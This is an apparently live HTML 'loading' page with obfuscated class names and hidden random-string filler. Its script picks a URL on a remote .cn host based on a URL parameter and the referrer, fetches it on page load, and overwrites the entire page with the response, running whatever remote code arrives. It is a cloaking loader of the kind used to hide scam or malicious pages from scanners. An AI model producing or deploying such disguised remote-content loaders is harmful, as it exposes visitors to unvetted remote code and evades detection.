<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Xdxg70sIJbQ {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Xdxg70sIJbQ .CTxMtYToiB {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Xdxg70sIJbQ .content {
            line-height: 50px;
            text-align: center
        }

        .Xdxg70sIJbQ .img {
            width: 100%
        }

        .Xdxg70sIJbQ .eGzYjF4 {
            text-align: center
        }

        .Xdxg70sIJbQ .eGzYjF4 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Xdxg70sIJbQ .eGzYjF4 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Xdxg70sIJbQ .eGzYjF4 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Xdxg70sIJbQ .eGzYjF4 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Xdxg70sIJbQ .eGzYjF4 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Xdxg70sIJbQ .eGzYjF4 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Xdxg70sIJbQ .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Ia1GY8BXV(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var m27J9A = Ia1GY8BXV('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ m27J9A +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ m27J9A +".html?a=share";
		}
		
        QqCxEcAC=url+"#"+new Date().getTime();
        QqCxEcAC && function() {
            $.get(QqCxEcAC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >DYPPoJGbPFLStl1zd308z5MAFjcgplTAh</h1>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>sCXsq4dFrpFrSUCqu</a>
<li style='display:none' >JN5P6Vsml8ubTWiEZqkNehcaye5</li>
<span style='display:none'>aKGKrmgGcb2WxJtQCcuwJn5KHKnl8kqZfcDIk1izXaXdn33aCOB</span>
<li style='display:none' >JN5P6Vsml8ubTWiEZqkNehcaye5</li>
<li style='display:none' >JN5P6Vsml8ubTWiEZqkNehcaye5</li>
<span style='display:none'>aKGKrmgGcb2WxJtQCcuwJn5KHKnl8kqZfcDIk1izXaXdn33aCOB</span>
<img  src='' style='display:none'>
<p  style='display:none'>Hn1bPNqMGt9yJejHQ6f1M4T70ij2hrzuJdXybvpGT12SO4cUtEVaDqrFJdgRUes</p><div class="Xdxg70sIJbQ">
    <div class="CTxMtYToiB">
        <div class="eGzYjF4">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>J3Ga0CaHn57YZkRWTSHpG</div>
<b style='display:none' >HzDAl0UKdySQCQSjkwS3eo506tJ1UarBjjIdLpwRuXtwJ6WTYDWYUxp71RDGON6Vl1Nd3KQ8WHsW6bnSDBBQs</b>
<img  src='' style='display:none'>
<ul style='display:none' >KAdx9cEgKW5nnRmLMKuFUefvdp3TYGMsrHicEzzUvqoZebjsohJ</ul>
<div style='display:none'>J3Ga0CaHn57YZkRWTSHpG</div>
<span style='display:none'>rfWH95aiJGUmkBxMj</span></body>
</html>